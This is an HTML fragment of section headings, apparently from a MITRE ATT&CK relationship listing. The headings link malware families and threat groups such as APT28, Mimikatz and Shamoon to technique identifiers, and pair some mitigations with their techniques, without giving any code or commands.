<h3 id="_t9000_s0098_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_t9000_s0098_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_t9000_s0098_uses_system_network_configuration_discovery_t1016">T9000 (S0098) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_cmd_s0106_uses_system_information_discovery_t1082"><a class="anchor" href="#_cmd_s0106_uses_system_information_discovery_t1082"></a><a class="link" href="#_cmd_s0106_uses_system_information_discovery_t1082">cmd (S0106) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_owaauth_s0072"><a class="anchor" href="#_threat_group_3390_g0027_uses_owaauth_s0072"></a><a class="link" href="#_threat_group_3390_g0027_uses_owaauth_s0072">Threat Group-3390 (G0027) uses OwaAuth (S0072)</a></h3>
</div>
<div class="sect2">
<h3 id="_cmd_s0106_uses_command_line_interface_t1059"><a class="anchor" href="#_cmd_s0106_uses_command_line_interface_t1059"></a><a class="link" href="#_cmd_s0106_uses_command_line_interface_t1059">cmd (S0106) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_miniduke_s0051_uses_web_service_t1102"><a class="anchor" href="#_miniduke_s0051_uses_web_service_t1102"></a><a class="link" href="#_miniduke_s0051_uses_web_service_t1102">MiniDuke (S0051) uses Web Service (T1102)</a></h3>
</div>
<div class="sect2">
<h3 id="_shamoon_s0140_uses_service_execution_t1035"><a class="anchor" href="#_shamoon_s0140_uses_service_execution_t1035"></a><a class="link" href="#_shamoon_s0140_uses_service_execution_t1035">Shamoon (S0140) uses Service Execution (T1035)</a></h3>
</div>
<div class="sect2">
<h3 id="_flame_s0143_uses_replication_through_removable_media_t1091"><a class="anchor" href="#_flame_s0143_uses_replication_through_removable_media_t1091"></a><a class="link" href="#_flame_s0143_uses_replication_through_removable_media_t1091">Flame (S0143) uses Replication Through Removable Media (T1091)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonfly_g0035_uses_trojan_karagany_s0094"><a class="anchor" href="#_dragonfly_g0035_uses_trojan_karagany_s0094"></a><a class="link" href="#_dragonfly_g0035_uses_trojan_karagany_s0094">Dragonfly (G0035) uses Trojan.Karagany (S0094)</a></h3>
</div>
<div class="sect2">
<h3 id="_ftp_s0095_uses_exfiltration_over_alternative_protocol_t1048"><a class="anchor" href="#_ftp_s0095_uses_exfiltration_over_alternative_protocol_t1048"></a><a class="link" href="#_ftp_s0095_uses_exfiltration_over_alternative_protocol_t1048">FTP (S0095) uses Exfiltration Over Alternative Protocol (T1048)</a></h3>
</div>
<div class="sect2">
<h3 id="_chopstick_s0023_uses_command_line_interface_t1059"><a class="anchor" href="#_chopstick_s0023_uses_command_line_interface_t1059"></a><a class="link" href="#_chopstick_s0023_uses_command_line_interface_t1059">CHOPSTICK (S0023) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_carbanak_s0030_uses_input_capture_t1056"><a class="anchor" href="#_carbanak_s0030_uses_input_capture_t1056"></a><a class="link" href="#_carbanak_s0030_uses_input_capture_t1056">Carbanak (S0030) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_cherry_picker_s0107_uses_file_deletion_t1107"><a class="anchor" href="#_cherry_picker_s0107_uses_file_deletion_t1107"></a><a class="link" href="#_cherry_picker_s0107_uses_file_deletion_t1107">Cherry Picker (S0107) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_duqu_s0038_uses_process_hollowing_t1093"><a class="anchor" href="#_duqu_s0038_uses_process_hollowing_t1093"></a><a class="link" href="#_duqu_s0038_uses_process_hollowing_t1093">Duqu (S0038) uses Process Hollowing (T1093)</a></h3>
</div>
<div class="sect2">
<h3 id="_kasidet_s0088_uses_input_capture_t1056"><a class="anchor" href="#_kasidet_s0088_uses_input_capture_t1056"></a><a class="link" href="#_kasidet_s0088_uses_input_capture_t1056">Kasidet (S0088) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin6_g0037_uses_scripting_t1064"><a class="anchor" href="#_fin6_g0037_uses_scripting_t1064"></a><a class="link" href="#_fin6_g0037_uses_scripting_t1064">FIN6 (G0037) uses Scripting (T1064)</a></h3>
</div>
<div class="sect2">
<h3 id="_installutil_mitigation_t1118_mitigates_installutil_t1118"><a class="anchor" href="#_installutil_mitigation_t1118_mitigates_installutil_t1118"></a><a class="link" href="#_installutil_mitigation_t1118_mitigates_installutil_t1118">InstallUtil Mitigation (T1118) mitigates InstallUtil (T1118)</a></h3>
</div>
<div class="sect2">
<h3 id="_derusbi_s0021_uses_process_injection_t1055"><a class="anchor" href="#_derusbi_s0021_uses_process_injection_t1055"></a><a class="link" href="#_derusbi_s0021_uses_process_injection_t1055">Derusbi (S0021) uses Process Injection (T1055)</a></h3>
</div>
<div class="sect2">
<h3 id="_jhuhugit_s0044_uses_component_object_model_hijacking_t1122"><a class="anchor" href="#_jhuhugit_s0044_uses_component_object_model_hijacking_t1122"></a><a class="link" href="#_jhuhugit_s0044_uses_component_object_model_hijacking_t1122">JHUHUGIT (S0044) uses Component Object Model Hijacking (T1122)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_system_network_connections_discovery_t1049"><a class="anchor" href="#_menupass_g0045_uses_system_network_connections_discovery_t1049"></a><a class="link" href="#_menupass_g0045_uses_system_network_connections_discovery_t1049">menuPass (G0045) uses System Network Connections Discovery (T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_powruner_s0184_uses_query_registry_t1012"><a class="anchor" href="#_powruner_s0184_uses_query_registry_t1012"></a><a class="link" href="#_powruner_s0184_uses_query_registry_t1012">POWRUNER (S0184) uses Query Registry (T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_mimikatz_s0002_uses_security_support_provider_t1101"><a class="anchor" href="#_mimikatz_s0002_uses_security_support_provider_t1101"></a><a class="link" href="#_mimikatz_s0002_uses_security_support_provider_t1101">Mimikatz (S0002) uses Security Support Provider (T1101)</a></h3>
</div>
<div class="sect2">
<h3 id="_launch_daemon_mitigation_t1160_mitigates_launch_daemon_t1160"><a class="anchor" href="#_launch_daemon_mitigation_t1160_mitigates_launch_daemon_t1160"></a><a class="link" href="#_launch_daemon_mitigation_t1160_mitigates_launch_daemon_t1160">Launch Daemon Mitigation (T1160) mitigates Launch Daemon (T1160)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin5_g0053_uses_valid_accounts_t1078"><a class="anchor" href="#_fin5_g0053_uses_valid_accounts_t1078"></a><a class="link" href="#_fin5_g0053_uses_valid_accounts_t1078">FIN5 (G0053) uses Valid Accounts (T1078)</a></h3>
</div>
<div class="sect2">
<h3 id="_execution_through_api_mitigation_t1106_mitigates_execution_through_api_t1106"><a class="anchor" href="#_execution_through_api_mitigation_t1106_mitigates_execution_through_api_t1106"></a><a class="link" href="#_execution_through_api_mitigation_t1106_mitigates_execution_through_api_t1106">Execution through API Mitigation (T1106) mitigates Execution through API (T1106)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_tor_s0183"><a class="anchor" href="#_apt29_g0016_uses_tor_s0183"></a><a class="link" href="#_apt29_g0016_uses_tor_s0183">APT29 (G0016) uses Tor (S0183)</a></h3>
</div>
<div class="sect2">
<h3 id="_fallchill_s0181_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_fallchill_s0181_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_fallchill_s0181_uses_custom_cryptographic_protocol_t1024">FALLCHILL (S0181) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_ping_s0097_uses_remote_system_discovery_t1018"><a class="anchor" href="#_ping_s0097_uses_remote_system_discovery_t1018"></a><a class="link" href="#_ping_s0097_uses_remote_system_discovery_t1018">Ping (S0097) uses Remote System Discovery (T1018)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_responder_s0174"><a class="anchor" href="#_apt28_g0007_uses_responder_s0174"></a><a class="link" href="#_apt28_g0007_uses_responder_s0174">APT28 (G0007) uses Responder (S0174)</a></h3>
</div>
<div class="sect2">
<h3 id="_reg_s0075_uses_query_registry_t1012"><a class="anchor" href="#_reg_s0075_uses_query_registry_t1012"></a><a class="link" href="#_reg_s0075_uses_query_registry_t1012">Reg (S0075) uses Query Registry (T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_redleaves_s0153_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_redleaves_s0153_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_redleaves_s0153_uses_standard_application_layer_protocol_t1071">RedLeaves (S0153) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_stealth_falcon_g0038_uses_scripting_t1064"><a class="anchor" href="#_stealth_falcon_g0038_uses_scripting_t1064"></a><a class="link" href="#_stealth_falcon_g0038_uses_scripting_t1064">Stealth Falcon (G0038) uses Scripting (T1064)</a></h3>
</div>
<div class="sect2">
<h3 id="_gazer_s0168_uses_screensaver_t1180"><a class="anchor" href="#_gazer_s0168_uses_screensaver_t1180"></a><a class="link" href="#_gazer_s0168_uses_screensaver_t1180">Gazer (S0168) uses Screensaver (T1180)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_system_network_connections_discovery_t1049"><a class="anchor" href="#_apt3_g0022_uses_system_network_connections_discovery_t1049"></a><a class="link" href="#_apt3_g0022_uses_system_network_connections_discovery_t1049">APT3 (G0022) uses System Network Connections Discovery (T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_xtunnel_s0117_uses_connection_proxy_t1090"><a class="anchor" href="#_xtunnel_s0117_uses_connection_proxy_t1090"></a><a class="link" href="#_xtunnel_s0117_uses_connection_proxy_t1090">XTunnel (S0117) uses Connection Proxy (T1090)</a></h3>
</div>
<div class="sect2">
<h3 id="_4h_rat_s0065_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_4h_rat_s0065_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_4h_rat_s0065_uses_file_and_directory_discovery_t1083">4H RAT (S0065) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_dust_storm_g0031_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_dust_storm_g0031_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_dust_storm_g0031_uses_obfuscated_files_or_information_t1027">Dust Storm (G0031) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_netsh_s0108"><a class="anchor" href="#_lazarus_group_g0032_uses_netsh_s0108"></a><a class="link" href="#_lazarus_group_g0032_uses_netsh_s0108">Lazarus Group (G0032) uses netsh (S0108)</a></h3>
</div>
<div class="sect2">
<h3 id="_derusbi_s0021_uses_timestomp_t1099"><a class="anchor" href="#_derusbi_s0021_uses_timestomp_t1099"></a><a class="link" href="#_derusbi_s0021_uses_timestomp_t1099">Derusbi (S0021) uses Timestomp (T1099)</a></h3>
</div>
<div class="sect2">
<h3 id="_emissary_s0082_uses_process_injection_t1055"><a class="anchor" href="#_emissary_s0082_uses_process_injection_t1055"></a><a class="link" href="#_emissary_s0082_uses_process_injection_t1055">Emissary (S0082) uses Process Injection (T1055)</a></h3>
</div>
<div class="sect2">
<h3 id="_usbstealer_s0136_uses_file_deletion_t1107"><a class="anchor" href="#_usbstealer_s0136_uses_file_deletion_t1107"></a><a class="link" href="#_usbstealer_s0136_uses_file_deletion_t1107">USBStealer (S0136) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_strider_g0041_uses_remsec_s0125"><a class="anchor" href="#_strider_g0041_uses_remsec_s0125"></a><a class="link" href="#_strider_g0041_uses_remsec_s0125">Strider (G0041) uses Remsec (S0125)</a></h3>
</div>
<div class="sect2">
<h3 id="_elise_s0081_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_elise_s0081_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_elise_s0081_uses_standard_cryptographic_protocol_t1032">Elise (S0081) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_derusbi_s0021_uses_system_information_discovery_t1082"><a class="anchor" href="#_derusbi_s0021_uses_system_information_discovery_t1082"></a><a class="link" href="#_derusbi_s0021_uses_system_information_discovery_t1082">Derusbi (S0021) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_tdtess_s0164_uses_file_deletion_t1107"><a class="anchor" href="#_tdtess_s0164_uses_file_deletion_t1107"></a><a class="link" href="#_tdtess_s0164_uses_file_deletion_t1107">TDTESS (S0164) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_duqu_s0038_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_duqu_s0038_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_duqu_s0038_uses_system_network_configuration_discovery_t1016">Duqu (S0038) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_volgmer_s0180_uses_modify_existing_service_t1031"><a class="anchor" href="#_volgmer_s0180_uses_modify_existing_service_t1031"></a><a class="link" href="#_volgmer_s0180_uses_modify_existing_service_t1031">Volgmer (S0180) uses Modify Existing Service (T1031)</a></h3>
</div>
<div class="sect2">
<h3 id="_t9000_s0098_uses_system_time_discovery_t1124"><a class="anchor" href="#_t9000_s0098_uses_system_time_discovery_t1124"></a><a class="link" href="#_t9000_s0098_uses_system_time_discovery_t1124">T9000 (S0098) uses System Time Discovery (T1124)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_network_service_scanning_t1046"><a class="anchor" href="#_menupass_g0045_uses_network_service_scanning_t1046"></a><a class="link" href="#_menupass_g0045_uses_network_service_scanning_t1046">menuPass (G0045) uses Network Service Scanning (T1046)</a></h3>
</div>
<div class="sect2">
<h3 id="_sykipot_s0018_uses_two_factor_authentication_interception_t1111"><a class="anchor" href="#_sykipot_s0018_uses_two_factor_authentication_interception_t1111"></a><a class="link" href="#_sykipot_s0018_uses_two_factor_authentication_interception_t1111">Sykipot (S0018) uses Two-Factor Authentication Interception (T1111)</a></h3>
</div>
<div class="sect2">
<h3 id="_backspace_s0031_uses_system_information_discovery_t1082"><a class="anchor" href="#_backspace_s0031_uses_system_information_discovery_t1082"></a><a class="link" href="#_backspace_s0031_uses_system_information_discovery_t1082">BACKSPACE (S0031) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_gazer_s0168_uses_winlogon_helper_dll_t1004"><a class="anchor" href="#_gazer_s0168_uses_winlogon_helper_dll_t1004"></a><a class="link" href="#_gazer_s0168_uses_winlogon_helper_dll_t1004">Gazer (S0168) uses Winlogon Helper DLL (T1004)</a></h3>
</div>
<div class="sect2">
<h3 id="_sys10_s0060_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_sys10_s0060_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_sys10_s0060_uses_system_owner_user_discovery_t1033">Sys10 (S0060) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_chches_s0144_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_chches_s0144_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_chches_s0144_uses_registry_run_keys_start_folder_t1060">ChChes (S0144) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_helminth_s0170_uses_scheduled_task_t1053"><a class="anchor" href="#_helminth_s0170_uses_scheduled_task_t1053"></a><a class="link" href="#_helminth_s0170_uses_scheduled_task_t1053">Helminth (S0170) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_remotecmd_s0166_uses_remote_file_copy_t1105"><a class="anchor" href="#_remotecmd_s0166_uses_remote_file_copy_t1105"></a><a class="link" href="#_remotecmd_s0166_uses_remote_file_copy_t1105">RemoteCMD (S0166) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_s_type_s0085_uses_masquerading_t1036"><a class="anchor" href="#_s_type_s0085_uses_masquerading_t1036"></a><a class="link" href="#_s_type_s0085_uses_masquerading_t1036">S-Type (S0085) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_tasklist_s0057_uses_system_service_discovery_t1007"><a class="anchor" href="#_tasklist_s0057_uses_system_service_discovery_t1007"></a><a class="link" href="#_tasklist_s0057_uses_system_service_discovery_t1007">Tasklist (S0057) uses System Service Discovery (T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_t9000_s0098_uses_security_software_discovery_t1063"><a class="anchor" href="#_t9000_s0098_uses_security_software_discovery_t1063"></a><a class="link" href="#_t9000_s0098_uses_security_software_discovery_t1063">T9000 (S0098) uses Security Software Discovery (T1063)</a></h3>
</div>
<div class="sect2">
<h3 id="_magic_hound_g0059_uses_commonly_used_port_t1043"><a class="anchor" href="#_magic_hound_g0059_uses_commonly_used_port_t1043"></a><a class="link" href="#_magic_hound_g0059_uses_commonly_used_port_t1043">Magic Hound (G0059) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_chches_s0144"><a class="anchor" href="#_menupass_g0045_uses_chches_s0144"></a><a class="link" href="#_menupass_g0045_uses_chches_s0144">menuPass (G0045) uses ChChes (S0144)</a></h3>
</div>
<div class="sect2">
<h3 id="_turla_g0010_uses_comrat_s0126"><a class="anchor" href="#_turla_g0010_uses_comrat_s0126"></a><a class="link" href="#_turla_g0010_uses_comrat_s0126">Turla (G0010) uses ComRAT (S0126)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_account_discovery_t1087"><a class="anchor" href="#_threat_group_3390_g0027_uses_account_discovery_t1087"></a><a class="link" href="#_threat_group_3390_g0027_uses_account_discovery_t1087">Threat Group-3390 (G0027) uses Account Discovery (T1087)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_jhuhugit_s0044"><a class="anchor" href="#_apt28_g0007_uses_jhuhugit_s0044"></a><a class="link" href="#_apt28_g0007_uses_jhuhugit_s0044">APT28 (G0007) uses JHUHUGIT (S0044)</a></h3>
</div>
<div class="sect2">
<h3 id="_rawpos_s0169_uses_data_encrypted_t1022"><a class="anchor" href="#_rawpos_s0169_uses_data_encrypted_t1022"></a><a class="link" href="#_rawpos_s0169_uses_data_encrypted_t1022">RawPOS (S0169) uses Data Encrypted (T1022)</a></h3>
</div>
<div class="sect2">
<h3 id="_patchwork_g0040_uses_command_line_interface_t1059"><a class="anchor" href="#_patchwork_g0040_uses_command_line_interface_t1059"></a><a class="link" href="#_patchwork_g0040_uses_command_line_interface_t1059">Patchwork (G0040) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_gamaredon_group_g0047_uses_data_from_removable_media_t1025"><a class="anchor" href="#_gamaredon_group_g0047_uses_data_from_removable_media_t1025"></a><a class="link" href="#_gamaredon_group_g0047_uses_data_from_removable_media_t1025">Gamaredon Group (G0047) uses Data from Removable Media (T1025)</a></h3>
</div>
<div class="sect2">
<h3 id="_elise_s0081_uses_account_discovery_t1087"><a class="anchor" href="#_elise_s0081_uses_account_discovery_t1087"></a><a class="link" href="#_elise_s0081_uses_account_discovery_t1087">Elise (S0081) uses Account Discovery (T1087)</a></h3>
</div>
<div class="sect2">
<h3 id="_wingbird_s0176_uses_dll_side_loading_t1073"><a class="anchor" href="#_wingbird_s0176_uses_dll_side_loading_t1073"></a><a class="link" href="#_wingbird_s0176_uses_dll_side_loading_t1073">Wingbird (S0176) uses DLL Side-Loading (T1073)</a></h3>
</div>
<div class="sect2">
<h3 id="_putter_panda_g0024_uses_pngdowner_s0067"><a class="anchor" href="#_putter_panda_g0024_uses_pngdowner_s0067"></a><a class="link" href="#_putter_panda_g0024_uses_pngdowner_s0067">Putter Panda (G0024) uses pngdowner (S0067)</a></h3>
</div>
<div class="sect2">
<h3 id="_fallchill_s0181_uses_system_information_discovery_t1082"><a class="anchor" href="#_fallchill_s0181_uses_system_information_discovery_t1082"></a><a class="link" href="#_fallchill_s0181_uses_system_information_discovery_t1082">FALLCHILL (S0181) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_account_manipulation_mitigation_t1098_mitigates_account_manipulation_t1098"><a class="anchor" href="#_account_manipulation_mitigation_t1098_mitigates_account_manipulation_t1098"></a><a class="link" href="#_account_manipulation_mitigation_t1098_mitigates_account_manipulation_t1098">Account Manipulation Mitigation (T1098) mitigates Account Manipulation (T1098)</a></h3>
</div>
<div class="sect2">
<h3 id="_scheduled_task_mitigation_t1053_mitigates_scheduled_task_t1053"><a class="anchor" href="#_scheduled_task_mitigation_t1053_mitigates_scheduled_task_t1053"></a><a class="link" href="#_scheduled_task_mitigation_t1053_mitigates_scheduled_task_t1053">Scheduled Task Mitigation (T1053) mitigates Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin5_g0053_uses_scripting_t1064"><a class="anchor" href="#_fin5_g0053_uses_scripting_t1064"></a><a class="link" href="#_fin5_g0053_uses_scripting_t1064">FIN5 (G0053) uses Scripting (T1064)</a></h3>
</div>
<div class="sect2">
<h3 id="_darkhotel_g0012_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_darkhotel_g0012_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_darkhotel_g0012_uses_registry_run_keys_start_folder_t1060">Darkhotel (G0012) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_moonwind_s0149_uses_input_capture_t1056"><a class="anchor" href="#_moonwind_s0149_uses_input_capture_t1056"></a><a class="link" href="#_moonwind_s0149_uses_input_capture_t1056">MoonWind (S0149) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_tasklist_s0057_uses_process_discovery_t1057"><a class="anchor" href="#_tasklist_s0057_uses_process_discovery_t1057"></a><a class="link" href="#_tasklist_s0057_uses_process_discovery_t1057">Tasklist (S0057) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_network_service_scanning_t1046"><a class="anchor" href="#_threat_group_3390_g0027_uses_network_service_scanning_t1046"></a><a class="link" href="#_threat_group_3390_g0027_uses_network_service_scanning_t1046">Threat Group-3390 (G0027) uses Network Service Scanning (T1046)</a></h3>
</div>
<div class="sect2">
<h3 id="_dustysky_s0062_uses_input_capture_t1056"><a class="anchor" href="#_dustysky_s0062_uses_input_capture_t1056"></a><a class="link" href="#_dustysky_s0062_uses_input_capture_t1056">DustySky (S0062) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_advstoreshell_s0045_uses_commonly_used_port_t1043"><a class="anchor" href="#_advstoreshell_s0045_uses_commonly_used_port_t1043"></a><a class="link" href="#_advstoreshell_s0045_uses_commonly_used_port_t1043">ADVSTORESHELL (S0045) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_screen_capture_t1113"><a class="anchor" href="#_apt28_g0007_uses_screen_capture_t1113"></a><a class="link" href="#_apt28_g0007_uses_screen_capture_t1113">APT28 (G0007) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_evilgrab_s0152_uses_video_capture_t1125"><a class="anchor" href="#_evilgrab_s0152_uses_video_capture_t1125"></a><a class="link" href="#_evilgrab_s0152_uses_video_capture_t1125">EvilGrab (S0152) uses Video Capture (T1125)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_pinchduke_s0048"><a class="anchor" href="#_apt29_g0016_uses_pinchduke_s0048"></a><a class="link" href="#_apt29_g0016_uses_pinchduke_s0048">APT29 (G0016) uses PinchDuke (S0048)</a></h3>
</div>
<div class="sect2">
<h3 id="_admin_338_g0018_uses_net_s0039"><a class="anchor" href="#_admin_338_g0018_uses_net_s0039"></a><a class="link" href="#_admin_338_g0018_uses_net_s0039">admin@338 (G0018) uses Net (S0039)</a></h3>
</div>
<div class="sect2">
<h3 id="_audio_capture_mitigation_t1123_mitigates_audio_capture_t1123"><a class="anchor" href="#_audio_capture_mitigation_t1123_mitigates_audio_capture_t1123"></a><a class="link" href="#_audio_capture_mitigation_t1123_mitigates_audio_capture_t1123">Audio Capture Mitigation (T1123) mitigates Audio Capture (T1123)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_commonly_used_port_t1043"><a class="anchor" href="#_threat_group_3390_g0027_uses_commonly_used_port_t1043"></a><a class="link" href="#_threat_group_3390_g0027_uses_commonly_used_port_t1043">Threat Group-3390 (G0027) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_winnti_group_g0044_uses_code_signing_t1116"><a class="anchor" href="#_winnti_group_g0044_uses_code_signing_t1116"></a><a class="link" href="#_winnti_group_g0044_uses_code_signing_t1116">Winnti Group (G0044) uses Code Signing (T1116)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_rundll32_t1085"><a class="anchor" href="#_apt28_g0007_uses_rundll32_t1085"></a><a class="link" href="#_apt28_g0007_uses_rundll32_t1085">APT28 (G0007) uses Rundll32 (T1085)</a></h3>
</div>
<div class="sect2">
<h3 id="_chches_s0144_uses_remote_file_copy_t1105"><a class="anchor" href="#_chches_s0144_uses_remote_file_copy_t1105"></a><a class="link" href="#_chches_s0144_uses_remote_file_copy_t1105">ChChes (S0144) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_dustysky_s0062_uses_security_software_discovery_t1063"><a class="anchor" href="#_dustysky_s0062_uses_security_software_discovery_t1063"></a><a class="link" href="#_dustysky_s0062_uses_security_software_discovery_t1063">DustySky (S0062) uses Security Software Discovery (T1063)</a></h3>
</div>
<div class="sect2">
<h3 id="_callme_s0077_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_callme_s0077_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_callme_s0077_uses_standard_cryptographic_protocol_t1032">CallMe (S0077) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_file_deletion_t1107"><a class="anchor" href="#_rtm_s0148_uses_file_deletion_t1107"></a><a class="link" href="#_rtm_s0148_uses_file_deletion_t1107">RTM (S0148) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_suckfly_g0039_uses_nidiran_s0118"><a class="anchor" href="#_suckfly_g0039_uses_nidiran_s0118"></a><a class="link" href="#_suckfly_g0039_uses_nidiran_s0118">Suckfly (G0039) uses Nidiran (S0118)</a></h3>
</div>
<div class="sect2">
<h3 id="_rawpos_s0169_uses_data_from_local_system_t1005"><a class="anchor" href="#_rawpos_s0169_uses_data_from_local_system_t1005"></a><a class="link" href="#_rawpos_s0169_uses_data_from_local_system_t1005">RawPOS (S0169) uses Data from Local System (T1005)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_powershell_t1086"><a class="anchor" href="#_menupass_g0045_uses_powershell_t1086"></a><a class="link" href="#_menupass_g0045_uses_powershell_t1086">menuPass (G0045) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_daserf_s0187_uses_remote_file_copy_t1105"><a class="anchor" href="#_daserf_s0187_uses_remote_file_copy_t1105"></a><a class="link" href="#_daserf_s0187_uses_remote_file_copy_t1105">Daserf (S0187) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_winmm_s0059_uses_process_discovery_t1057"><a class="anchor" href="#_winmm_s0059_uses_process_discovery_t1057"></a><a class="link" href="#_winmm_s0059_uses_process_discovery_t1057">WinMM (S0059) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_flame_s0143_uses_exfiltration_over_other_network_medium_t1011"><a class="anchor" href="#_flame_s0143_uses_exfiltration_over_other_network_medium_t1011"></a><a class="link" href="#_flame_s0143_uses_exfiltration_over_other_network_medium_t1011">Flame (S0143) uses Exfiltration Over Other Network Medium (T1011)</a></h3>
</div>
<div class="sect2">
<h3 id="_rarstone_s0055_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_rarstone_s0055_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_rarstone_s0055_uses_standard_application_layer_protocol_t1071">RARSTONE (S0055) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_sakula_s0074_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_sakula_s0074_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_sakula_s0074_uses_standard_application_layer_protocol_t1071">Sakula (S0074) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackenergy_s0089_uses_system_information_discovery_t1082"><a class="anchor" href="#_blackenergy_s0089_uses_system_information_discovery_t1082"></a><a class="link" href="#_blackenergy_s0089_uses_system_information_discovery_t1082">BlackEnergy (S0089) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_pteranodon_s0147_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_pteranodon_s0147_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_pteranodon_s0147_uses_registry_run_keys_start_folder_t1060">Pteranodon (S0147) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
